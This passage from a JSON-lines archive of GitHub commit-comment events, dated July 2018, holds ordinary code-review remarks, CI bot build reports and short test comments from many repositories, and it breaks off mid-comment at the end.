{"id":"8009287661","type":"CommitCommentEvent","actor":{"login":"dkocich"},"repo":{"name":"sriks123/gtfsintegrate"},"payload":{"comment":{"id":29812300,"position":null,"line":null,"path":null,"commit_id":"a3de11ca96c782ccd73fffef56fa3cdb4dcc337a","created_at":"2018-07-24T10:33:45Z","updated_at":"2018-07-24T10:33:45Z","author_association":"COLLABORATOR","body":"I do not get why this commit contains all the same changes that I made previously but it is still named as \"Show unique itineraries on map\"... you should merge master or rebase in your branches or name/comment it how it should be. It is confusing to see in the history later."}},"created_at":"2018-07-24T10:33:45Z"}
{"id":"8009289227","type":"CommitCommentEvent","actor":{"login":"MoochMcGee"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29812303,"position":null,"line":null,"path":null,"commit_id":"10094b242a52629dbe8ebcbe4e6cb81915381256","created_at":"2018-07-24T10:34:07Z","updated_at":"2018-07-24T10:34:07Z","author_association":"CONTRIBUTOR","body":"This has been fixed here https://github.com/mamedev/mame/pull/3785"}},"created_at":"2018-07-24T10:34:07Z"}
{"id":"8009290209","type":"CommitCommentEvent","actor":{"login":"markknol"},"repo":{"name":"HaxeFoundation/HaxeManual"},"payload":{"comment":{"id":29812304,"position":4,"line":159,"path":"HaxeManual/05-expressions.tex","commit_id":"b1a7a1d967aebb62f1d38b93a61393e12c034890","created_at":"2018-07-24T10:34:19Z","updated_at":"2018-07-24T10:34:19Z","author_association":"MEMBER","body":"w00psie"}},"created_at":"2018-07-24T10:34:19Z"}
{"id":"8009290660","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812306,"position":404,"line":528,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T10:34:25Z","updated_at":"2018-07-24T10:34:25Z","author_association":"NONE","body":"Why do you call \"prefetch\" here?"}},"created_at":"2018-07-24T10:34:25Z"}
{"id":"8009291291","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/HaxeManual"},"payload":{"comment":{"id":29812308,"position":13,"line":25,"path":"HaxeManual/01-introduction.tex","commit_id":"54eaebb4510d2210a54d10e8553f643fdca1ccd3","created_at":"2018-07-24T10:34:33Z","updated_at":"2018-07-24T10:34:33Z","author_association":"MEMBER","body":"I don't think \"Lua\" is spelled all-uppercase like that?\r\n\r\nhttps://en.wikipedia.org/wiki/Lua_(programming_language)"}},"created_at":"2018-07-24T10:34:33Z"}
{"id":"8009291673","type":"CommitCommentEvent","actor":{"login":"MikhailSkirukha"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29812315,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T10:34:38Z","updated_at":"2018-07-24T10:34:38Z","author_association":"OWNER","body":"Thanks, we'll think about it.\r\n\r\n_Best regards, \"FIND\" support team. Thank you for using our product._"}},"created_at":"2018-07-24T10:34:38Z"}
{"id":"8009293181","type":"CommitCommentEvent","actor":{"login":"ghostrider-reborn"},"repo":{"name":"lettuce-oreo/android_device_yu_lettuce"},"payload":{"comment":{"id":29812321,"position":null,"line":null,"path":null,"commit_id":"603840139174110eb25d1e36162781fb966fb0d9","created_at":"2018-07-24T10:34:58Z","updated_at":"2018-07-24T10:34:58Z","author_association":"MEMBER","body":"@Akianonymus Yesterday I tested a crdroid build with this implementation and MSIM prov worked just fine :)"}},"created_at":"2018-07-24T10:34:58Z"}
{"id":"8009296684","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812330,"position":407,"line":531,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T10:35:41Z","updated_at":"2018-07-24T10:35:41Z","author_association":"NONE","body":"Please don't call transfer_stats periodically,\r\nYou can combine counters from all local cores only under get_stats request"}},"created_at":"2018-07-24T10:35:41Z"}
{"id":"8009298846","type":"CommitCommentEvent","actor":{"login":"jeenbroekstra"},"repo":{"name":"eclipse/rdf4j"},"payload":{"comment":{"id":29812334,"position":14,"line":49,"path":"sparqlbuilder/src/main/java/org/eclipse/rdf4j/sparqlbuilder/util/SparqlBuilderUtils.java","commit_id":"46e4f1bcb880de61743a62ee7afb2b08ed45b3c0","created_at":"2018-07-24T10:36:10Z","updated_at":"2018-07-24T10:36:10Z","author_association":"CONTRIBUTOR","body":"Good point, thanks. I'm just trying things out at this point to be honest, but that sounds sensible."}},"created_at":"2018-07-24T10:36:10Z"}
{"id":"8009299628","type":"CommitCommentEvent","actor":{"login":"AlexanderAmelkin"},"repo":{"name":"open-power/vpdtools"},"payload":{"comment":{"id":29812336,"position":48,"line":48,"path":"examples/p9/openbmc/openPower_obmc_opfr_record.xml","commit_id":"0792c52015f3ff1c7186f0ac8b48b109c54df0a1","created_at":"2018-07-24T10:36:19Z","updated_at":"2018-07-24T10:36:19Z","author_association":"NONE","body":"@youhour, could you please point me to the specification describing this keyword? I can't see it in the version of \"Vital Product Data Records for OpenPOWER Field Replaceable Units User’s Guide\" that I have (2.0 from Sep 2015). Is there a newer version that you used or did you just invent this keyword?"}},"created_at":"2018-07-24T10:36:19Z"}
{"id":"8009299633","type":"CommitCommentEvent","actor":{"login":"githubuserdlp"},"repo":{"name":"githubuserdlp/TEST"},"payload":{"comment":{"id":29812337,"position":null,"line":null,"path":null,"commit_id":"ca9076bc653865997690d0e94ce94f52fff90ba9","created_at":"2018-07-24T10:36:19Z","updated_at":"2018-07-24T10:36:19Z","author_association":"OWNER","body":"\r\n[f24072018103606_download.txt](https://github.com/githubuserdlp/TEST/files/2223226/f24072018103606_download.txt)\r\n"}},"created_at":"2018-07-24T10:36:19Z"}
{"id":"8009300730","type":"CommitCommentEvent","actor":{"login":"Martichou"},"repo":{"name":"Martichou/android_device_motorola_potter"},"payload":{"comment":{"id":29812342,"position":null,"line":null,"path":null,"commit_id":"654854f3bc695a7cfbcc5ff11d7d3943b67869af","created_at":"2018-07-24T10:36:33Z","updated_at":"2018-07-24T10:36:33Z","author_association":"OWNER","body":"On Potter we don't have a Big or Little cluster."}},"created_at":"2018-07-24T10:36:33Z"}
{"id":"8009301742","type":"CommitCommentEvent","actor":{"login":"pYtato-KK"},"repo":{"name":"pYtato-KK/ProLog"},"payload":{"comment":{"id":29812344,"position":null,"line":null,"path":null,"commit_id":"12e1b040bada33a08711763e54441c60511cdf2e","created_at":"2018-07-24T10:36:46Z","updated_at":"2018-07-24T10:36:46Z","author_association":"OWNER","body":"How salty can you be"}},"created_at":"2018-07-24T10:36:46Z"}
{"id":"8009316624","type":"CommitCommentEvent","actor":{"login":"mutiaraauliya"},"repo":{"name":"jakeuchre/artikel"},"payload":{"comment":{"id":29812364,"position":5,"line":5,"path":"9 peluang bisnis online dengan modal kecil [infographics].md","commit_id":"f9f4f2a14658f2907473e50763860a9669cb3ab3","created_at":"2018-07-24T10:40:00Z","updated_at":"2018-07-24T10:40:00Z","author_association":"NONE","body":"ku bingung ini maksud e pie .__. Mungkin begini: Dikalangan anak muda dan generasi jaman now, bisnis online belakangan sangat populer "}},"created_at":"2018-07-24T10:40:00Z"}
{"id":"8009316653","type":"CommitCommentEvent","actor":{"login":"VishwasLathi"},"repo":{"name":"VishwasLathi/Learn-to-play-atari-using-reinforcement-learning"},"payload":{"comment":{"id":29812365,"position":null,"line":null,"path":null,"commit_id":"391663ae92ea51c454fe3bee44ef8a37c0fd3e39","created_at":"2018-07-24T10:40:00Z","updated_at":"2018-07-24T10:40:00Z","author_association":"OWNER","body":"ACA project"}},"created_at":"2018-07-24T10:40:00Z"}
{"id":"8009316989","type":"CommitCommentEvent","actor":{"login":"krimrise"},"repo":{"name":"krimrise/bareos"},"payload":{"comment":{"id":29812366,"position":null,"line":null,"path":null,"commit_id":"3d1b9b5a5fdafcd5b067100761d9462fb4091ad7","created_at":"2018-07-24T10:40:03Z","updated_at":"2018-07-24T10:40:03Z","author_association":"OWNER","body":"xx"}},"created_at":"2018-07-24T10:40:03Z"}
{"id":"8009322682","type":"CommitCommentEvent","actor":{"login":"Shadowss"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29812372,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T10:41:13Z","updated_at":"2018-07-24T10:41:13Z","author_association":"OWNER","body":"I use Current PHP version:  7.0 \r\n\r\nCannot update in 7.2 :("}},"created_at":"2018-07-24T10:41:13Z"}
{"id":"8009323849","type":"CommitCommentEvent","actor":{"login":"annoviko"},"repo":{"name":"kwonoh/pyclustering"},"payload":{"comment":{"id":29812375,"position":null,"line":null,"path":null,"commit_id":"69209e546a78a22fb01236e0d91a532dcbddc002","created_at":"2018-07-24T10:41:28Z","updated_at":"2018-07-24T10:41:28Z","author_association":"NONE","body":"@kwonoh, \r\n\r\nThank you very much for the information! I will transfer medoids from C++ to Python instead of recalculation - it should improve performance (initially I thought that it didn't take a lot of time therefore decided to escape transferring medoids from C++ implementation)."}},"created_at":"2018-07-24T10:41:28Z"}
{"id":"8009337759","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29812404,"position":null,"line":null,"path":null,"commit_id":"48202596cd38b37c2304ed87c37e5a6142992058","created_at":"2018-07-24T10:44:20Z","updated_at":"2018-07-24T10:44:20Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-24T10:44:20Z"}
{"id":"8009338281","type":"CommitCommentEvent","actor":{"login":"johnmorleybjss"},"repo":{"name":"dvsa/rsp-public-portal"},"payload":{"comment":{"id":29812405,"position":null,"line":null,"path":null,"commit_id":"5dba76a99e48a6884317f13656927de2c0cc3d92","created_at":"2018-07-24T10:44:26Z","updated_at":"2018-07-24T10:44:26Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-24T10:44:26Z"}
{"id":"8009339787","type":"CommitCommentEvent","actor":{"login":"johnmorleybjss"},"repo":{"name":"dvsa/rsp-public-portal"},"payload":{"comment":{"id":29812407,"position":null,"line":null,"path":null,"commit_id":"c4dfb1c799a1112ce7cf69da189a9814b25fd8bc","created_at":"2018-07-24T10:44:46Z","updated_at":"2018-07-24T10:44:46Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-24T10:44:46Z"}
{"id":"8009344898","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29812424,"position":null,"line":null,"path":null,"commit_id":"48202596cd38b37c2304ed87c37e5a6142992058","created_at":"2018-07-24T10:45:52Z","updated_at":"2018-07-24T10:45:52Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-48202596cd38b37c2304ed87c37e5a6142992058-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T10:45:52Z"}
{"id":"8009347729","type":"CommitCommentEvent","actor":{"login":"rusmonster"},"repo":{"name":"bitstadium/HockeySDK-Android"},"payload":{"comment":{"id":29812435,"position":5,"line":8,"path":"hockeysdk/src/main/AndroidManifest.xml","commit_id":"8d24cc936fb5338d2c8d24f1e980bcd40a30b887","created_at":"2018-07-24T10:46:28Z","updated_at":"2018-07-24T10:46:28Z","author_association":"NONE","body":"imho, it is really bad idea to add maxSdkVersion here.\r\n\r\nI just spent whole day to find out why WRITE_EXTERNAL_STORAGE permission stoped working in our app.\r\nFinally I found you mentioned it in the release notes, but no so many people actually read the release notes before they upgrade 3rd party dependencies version.\r\n"}},"created_at":"2018-07-24T10:46:28Z"}
{"id":"8009350350","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29812442,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T10:47:03Z","updated_at":"2018-07-24T10:47:03Z","author_association":"COLLABORATOR","body":"Ok, I'll change my version to PHP 7.0, to see why this happens."}},"created_at":"2018-07-24T10:47:03Z"}
{"id":"8009359686","type":"CommitCommentEvent","actor":{"login":"shahparan"},"repo":{"name":"shahparan/TestGit"},"payload":{"comment":{"id":29812458,"position":null,"line":null,"path":null,"commit_id":"8dc1bcbffaba1dd5aeb1f91f7ba6f2a030e6c137","created_at":"2018-07-24T10:49:02Z","updated_at":"2018-07-24T10:49:02Z","author_association":"OWNER","body":"nice work"}},"created_at":"2018-07-24T10:49:02Z"}
{"id":"8009361255","type":"CommitCommentEvent","actor":{"login":"ceilican"},"repo":{"name":"ScorexFoundation/Scorex"},"payload":{"comment":{"id":29812459,"position":21,"line":169,"path":"src/main/scala/scorex/core/network/NetworkController.scala","commit_id":"578b39a0da793785a98c30004e53349c6b1a4057","created_at":"2018-07-24T10:49:22Z","updated_at":"2018-07-24T10:49:22Z","author_association":"COLLABORATOR","body":"What is `t`? I suggest giving it a more informative name."}},"created_at":"2018-07-24T10:49:22Z"}
{"id":"8009364220","type":"CommitCommentEvent","actor":{"login":"michaelloewensteinviz"},"repo":{"name":"mlevinov/TicTacToe_Android"},"payload":{"comment":{"id":29812466,"position":85,"line":85,"path":"app/src/main/java/com/example/mlevi/tictactoe/Board.java","commit_id":"22c83607c0b5f7a9dea141a2c7d24c3873ba334e","created_at":"2018-07-24T10:50:01Z","updated_at":"2018-07-24T10:50:01Z","author_association":"NONE","body":"why return null"}},"created_at":"2018-07-24T10:50:01Z"}
{"id":"8009364796","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"shikamaY/meikaiJava_shikama"},"payload":{"comment":{"id":29812469,"position":31,"line":31,"path":"java_ensyu/src/Ensyu9/Ensyu9_5_period.java","commit_id":"a39e2826f38210b9ddcd3e9b0fb85a838033bdcf","created_at":"2018-07-24T10:50:08Z","updated_at":"2018-07-24T10:50:08Z","author_association":"COLLABORATOR","body":"newでメモリを確保しなおす必要はなさそうです。(石井)"}},"created_at":"2018-07-24T10:50:08Z"}
{"id":"8009366797","type":"CommitCommentEvent","actor":{"login":"AlexanderAmelkin"},"repo":{"name":"open-power/vpdtools"},"payload":{"comment":{"id":29812474,"position":52,"line":52,"path":"examples/p9/openbmc/openPower_obmc_opfr_record.xml","commit_id":"0792c52015f3ff1c7186f0ac8b48b109c54df0a1","created_at":"2018-07-24T10:50:33Z","updated_at":"2018-07-24T10:50:33Z","author_association":"NONE","body":"Without the specification is is unclear what exactly this field is intended to contain.\r\nMy assumption that it may contain a BCD-encoded date and time fails because 'YYYYMMDDHHmmSS\" is two hex digits (1 byte) shorter than your example. I could think of having the time zone encoded along with the timestamp, but the format is ambiguous."}},"created_at":"2018-07-24T10:50:33Z"}
{"id":"8009367754","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"shikamaY/meikaiJava_shikama"},"payload":{"comment":{"id":29812477,"position":36,"line":36,"path":"java_ensyu/src/Ensyu9/Ensyu9_5_period.java","commit_id":"a39e2826f38210b9ddcd3e9b0fb85a838033bdcf","created_at":"2018-07-24T10:50:44Z","updated_at":"2018-07-24T10:50:44Z","author_association":"COLLABORATOR","body":"newでメモリを確保しなおす必要はなさそうです。(石井)"}},"created_at":"2018-07-24T10:50:44Z"}
{"id":"8009369963","type":"CommitCommentEvent","actor":{"login":"mlevinov"},"repo":{"name":"mlevinov/TicTacToe_Android"},"payload":{"comment":{"id":29812482,"position":85,"line":85,"path":"app/src/main/java/com/example/mlevi/tictactoe/Board.java","commit_id":"22c83607c0b5f7a9dea141a2c7d24c3873ba334e","created_at":"2018-07-24T10:51:12Z","updated_at":"2018-07-24T10:51:12Z","author_association":"OWNER","body":"סביר להניח שלא שמתי לב שהשארתי את זה שם כברירת מחדל\r\n\r\nOn Tue, 24 Jul 2018 at 13:50 michael loewenstein <notifications@github.com>\r\nwrote:\r\n\r\n> why return null\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/mlevinov/TicTacToe_Android/commit/22c83607c0b5f7a9dea141a2c7d24c3873ba334e#commitcomment-29812466>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AnrdE4LQVAz6Cll_J3JcixZDCCN8wuH8ks5uJvvZgaJpZM4VcgvN>\r\n> .\r\n>\r\n-- \r\nתודה רבה,\r\nמיכאל לוינוב\r\n"}},"created_at":"2018-07-24T10:51:12Z"}
{"id":"8009370048","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812483,"position":363,"line":474,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T10:51:14Z","updated_at":"2018-07-24T10:51:14Z","author_association":"NONE","body":"I think decrease counters is not safe. Maybe you clear them before,\r\nI think it is better to increment counters only after successful / unsuccessful call rte_eth_tx_burst."}},"created_at":"2018-07-24T10:51:14Z"}
{"id":"8009371361","type":"CommitCommentEvent","actor":{"login":"michaelloewensteinviz"},"repo":{"name":"mlevinov/TicTacToe_Android"},"payload":{"comment":{"id":29812486,"position":27,"line":27,"path":"app/src/main/java/com/example/mlevi/tictactoe/VsPC.java","commit_id":"22c83607c0b5f7a9dea141a2c7d24c3873ba334e","created_at":"2018-07-24T10:51:29Z","updated_at":"2018-07-24T10:51:29Z","author_association":"NONE","body":"remove comment"}},"created_at":"2018-07-24T10:51:29Z"}
{"id":"8009374910","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29812500,"position":null,"line":null,"path":null,"commit_id":"d011a5c80cf2f19e8943a2602571f8280f1dc45a","created_at":"2018-07-24T10:52:10Z","updated_at":"2018-07-24T10:52:10Z","author_association":"OWNER","body":"commit index do Acount"}},"created_at":"2018-07-24T10:52:10Z"}
{"id":"8009375215","type":"CommitCommentEvent","actor":{"login":"michaelloewensteinviz"},"repo":{"name":"mlevinov/TicTacToe_Android"},"payload":{"comment":{"id":29812501,"position":38,"line":38,"path":"app/src/main/java/com/example/mlevi/tictactoe/VsPC.java","commit_id":"22c83607c0b5f7a9dea141a2c7d24c3873ba334e","created_at":"2018-07-24T10:52:14Z","updated_at":"2018-07-24T10:52:14Z","author_association":"NONE","body":"pointer might return null and crash"}},"created_at":"2018-07-24T10:52:14Z"}
{"id":"8009378347","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812504,"position":386,"line":510,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T10:52:53Z","updated_at":"2018-07-24T10:52:53Z","author_association":"NONE","body":"Who is responsible to call lport_drain_tx_ring() function if no more transmit via this p-port?\r\n"}},"created_at":"2018-07-24T10:52:53Z"}
{"id":"8009378743","type":"CommitCommentEvent","actor":{"login":"michaelloewensteinviz"},"repo":{"name":"mlevinov/TicTacToe_Android"},"payload":{"comment":{"id":29812505,"position":14,"line":14,"path":"app/src/test/java/com/example/mlevi/tictactoe/ExampleUnitTest.java","commit_id":"22c83607c0b5f7a9dea141a2c7d24c3873ba334e","created_at":"2018-07-24T10:52:58Z","updated_at":"2018-07-24T10:52:58Z","author_association":"NONE","body":"not in use, have you got any unittests of your own?"}},"created_at":"2018-07-24T10:52:58Z"}
{"id":"8009380678","type":"CommitCommentEvent","actor":{"login":"Maksvel123"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812507,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T10:53:22Z","updated_at":"2018-07-24T10:53:22Z","author_association":"NONE","body":"Very nice project"}},"created_at":"2018-07-24T10:53:22Z"}
{"id":"8009381939","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"shikamaY/meikaiJava_shikama"},"payload":{"comment":{"id":29812509,"position":107,"line":107,"path":"java_ensyu/src/Ensyu9/Ensyu9_5_Day.java","commit_id":"a39e2826f38210b9ddcd3e9b0fb85a838033bdcf","created_at":"2018-07-24T10:53:38Z","updated_at":"2018-07-24T10:53:38Z","author_association":"COLLABORATOR","body":"不変であることがわかり切っているものは定数として宣言しちゃいましょう(石井)"}},"created_at":"2018-07-24T10:53:38Z"}
{"id":"8009385883","type":"CommitCommentEvent","actor":{"login":"pauladambrosa"},"repo":{"name":"johnfoderaro/g-bot"},"payload":{"comment":{"id":29812515,"position":null,"line":null,"path":null,"commit_id":"c3e7e5707e3c2d822a335d2a06975723a8f77554","created_at":"2018-07-24T10:54:27Z","updated_at":"2018-07-24T10:54:27Z","author_association":"NONE","body":"Woohoo. \n\n> On Jul 23, 2018, at 7:59 PM, John Foderaro <notifications@github.com> wrote:\n> \n> add G Bot cat icon (thanks, @PaulaDambrosa)\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/johnfoderaro/g-bot/commit/c3e7e5707e3c2d822a335d2a06975723a8f77554\n"}},"created_at":"2018-07-24T10:54:27Z"}
{"id":"8009386731","type":"CommitCommentEvent","actor":{"login":"nageshsky"},"repo":{"name":"nageshsky/repo1"},"payload":{"comment":{"id":29812517,"position":null,"line":null,"path":null,"commit_id":"ae2fc3dfb80916bc67daa7f649af221f9e679803","created_at":"2018-07-24T10:54:39Z","updated_at":"2018-07-24T10:54:39Z","author_association":"OWNER","body":"sadada"}},"created_at":"2018-07-24T10:54:39Z"}
{"id":"8009387598","type":"CommitCommentEvent","actor":{"login":"michaelloewensteinviz"},"repo":{"name":"mlevinov/TicTacToe_Android"},"payload":{"comment":{"id":29812519,"position":29,"line":29,"path":"app/src/main/java/com/example/mlevi/tictactoe/InsertNames.java","commit_id":"22c83607c0b5f7a9dea141a2c7d24c3873ba334e","created_at":"2018-07-24T10:54:50Z","updated_at":"2018-07-24T10:54:50Z","author_association":"NONE","body":"Consts are usually defined outside of the calling context - no need to initialize them every function call"}},"created_at":"2018-07-24T10:54:50Z"}
{"id":"8009393870","type":"CommitCommentEvent","actor":{"login":"irwir"},"repo":{"name":"miniupnp/miniupnp"},"payload":{"comment":{"id":29812532,"position":null,"line":null,"path":null,"commit_id":"c55d27f46ef9649feada028583c4d3354e7909f0","created_at":"2018-07-24T10:56:10Z","updated_at":"2018-07-24T10:56:10Z","author_association":"CONTRIBUTOR","body":"Two condition checks `_WIN32_WINNT > _WIN32_WINNT_WINXP` should use 'Vista' constant."}},"created_at":"2018-07-24T10:56:10Z"}
{"id":"8009394229","type":"CommitCommentEvent","actor":{"login":"vkpro"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29812535,"position":null,"line":null,"path":null,"commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-24T10:56:14Z","updated_at":"2018-07-24T10:56:14Z","author_association":"NONE","body":"It is very sad that fatal flag does not work on s390x. How can we fix this problem?\r\n`BOOT_EXISTING_S390` works like a charm. Thanks for advice."}},"created_at":"2018-07-24T10:56:14Z"}
{"id":"8009398411","type":"CommitCommentEvent","actor":{"login":"Luka967"},"repo":{"name":"Luka967/CSSockets"},"payload":{"comment":{"id":29812541,"position":null,"line":null,"path":null,"commit_id":"03291fd4d08037cb2f0b6923171f8cac01867ab7","created_at":"2018-07-24T10:57:11Z","updated_at":"2018-07-24T10:57:11Z","author_association":"OWNER","body":"yes"}},"created_at":"2018-07-24T10:57:11Z"}
{"id":"8009398801","type":"CommitCommentEvent","actor":{"login":"datreeio[bot]"},"repo":{"name":"datreeio/datree-pr-checks"},"payload":{"comment":{"id":29812542,"position":null,"line":null,"path":null,"commit_id":"1c5f2805005bd4690e049da249e1b51753cbae21","created_at":"2018-07-24T10:57:15Z","updated_at":"2018-07-24T10:57:15Z","author_association":"NONE","body":"\n:crown: Good job! this pull request is aligned with your organization's best practices!\n:speak_no_evil: We don’t have additional insights for this pull request\n:point_right: <a href='https://github.com/datreeio/datree-pr-checks/pull/6/checks?check_run_id=8960706'>click here</a> to view a full list of the events :point_left:\n"}},"created_at":"2018-07-24T10:57:15Z"}
{"id":"8009407839","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29812562,"position":null,"line":null,"path":null,"commit_id":"d011a5c80cf2f19e8943a2602571f8280f1dc45a","created_at":"2018-07-24T10:59:10Z","updated_at":"2018-07-24T10:59:10Z","author_association":"OWNER","body":"commit index"}},"created_at":"2018-07-24T10:59:10Z"}
{"id":"8009412179","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29812571,"position":54,"line":54,"path":"contracts/SplitterUtility.sol","commit_id":"19438b2ecb97cb416709db96ebb199f6bcde1796","created_at":"2018-07-24T11:00:05Z","updated_at":"2018-07-24T11:00:05Z","author_association":"NONE","body":"No, what comes off their balance has already come off their balance and is evidenced by `msg.value`."}},"created_at":"2018-07-24T11:00:05Z"}
{"id":"8009415283","type":"CommitCommentEvent","actor":{"login":"saileshatgithub"},"repo":{"name":"saileshatgithub/helloworldd"},"payload":{"comment":{"id":29812581,"position":null,"line":null,"path":null,"commit_id":"dab1230303807b334cb27ccef51d0a54c1316180","created_at":"2018-07-24T11:00:42Z","updated_at":"2018-07-24T11:00:42Z","author_association":"OWNER","body":"sdd"}},"created_at":"2018-07-24T11:00:42Z"}
{"id":"8009417994","type":"CommitCommentEvent","actor":{"login":"bhargavkuchipudi0"},"repo":{"name":"bhargavkuchipudi0/chat"},"payload":{"comment":{"id":29812583,"position":8,"line":6,"path":"app.js","commit_id":"96d77198a8b9c6959a3eae1d40846d183f341b50","created_at":"2018-07-24T11:01:18Z","updated_at":"2018-07-24T11:01:18Z","author_association":"OWNER","body":"sample\r\n"}},"created_at":"2018-07-24T11:01:18Z"}
{"id":"8009419132","type":"CommitCommentEvent","actor":{"login":"ice5x"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812586,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T11:01:33Z","updated_at":"2018-07-24T11:01:33Z","author_association":"NONE","body":"interesting.... when is the ico"}},"created_at":"2018-07-24T11:01:33Z"}
{"id":"8009420397","type":"CommitCommentEvent","actor":{"login":"lexdene"},"repo":{"name":"yetone/olo"},"payload":{"comment":{"id":29812587,"position":57,"line":57,"path":"olo/cache.py","commit_id":"c96f7d4dd54f08eb24b6544565447277f705cb4b","created_at":"2018-07-24T11:01:51Z","updated_at":"2018-07-24T11:01:51Z","author_association":"NONE","body":"@yetone 这个比率可以由开发者自己来定义吗？\r\n比如说，开发环境是 100% ，线上环境是 5% ."}},"created_at":"2018-07-24T11:01:51Z"}
{"id":"8009422742","type":"CommitCommentEvent","actor":{"login":"banks"},"repo":{"name":"hashicorp/consul"},"payload":{"comment":{"id":29812588,"position":9,"line":40,"path":"website/source/docs/guides/deployment.html.md","commit_id":"c7c620aa2c1b10fb9b080b38a5f10cc4ad94b9b6","created_at":"2018-07-24T11:02:19Z","updated_at":"2018-07-24T11:02:19Z","author_association":"CONTRIBUTOR","body":"This is better but still reads a bit strangely to me. I suggest replacing the second two paragraphs above with:\r\n---\r\n\r\nA single Consul datacenter includes a set of servers that maintain consensus. These are designed to be be deployed in a single geographical location to ensure low latency for consensus operations otherwise performance and stability can be significantly compromised. In cloud environments, spreading the servers over multiple availability zones within the same region is recommended for fault tolerance while maintaining low-latency and high performance networking.\r\n\r\nConsul supports multi-datacenter deployments via federation. The servers in each datacenter are joined by WAN gossip to enable forwarding service discovery and KV requests between datacenters. The separate datacenters do not replicate services or KV state between them to ensure they remain as isolated failure domains. Each set of servers must remain available (with at least a quorum online) for cross-datacenter requests to be made. If one datacenter has an outage of the servers, services within that datacenter will not be discoverable outside it until the servers recover.\r\n\r\n---\r\nSome of those parts could optionally be linked to our other 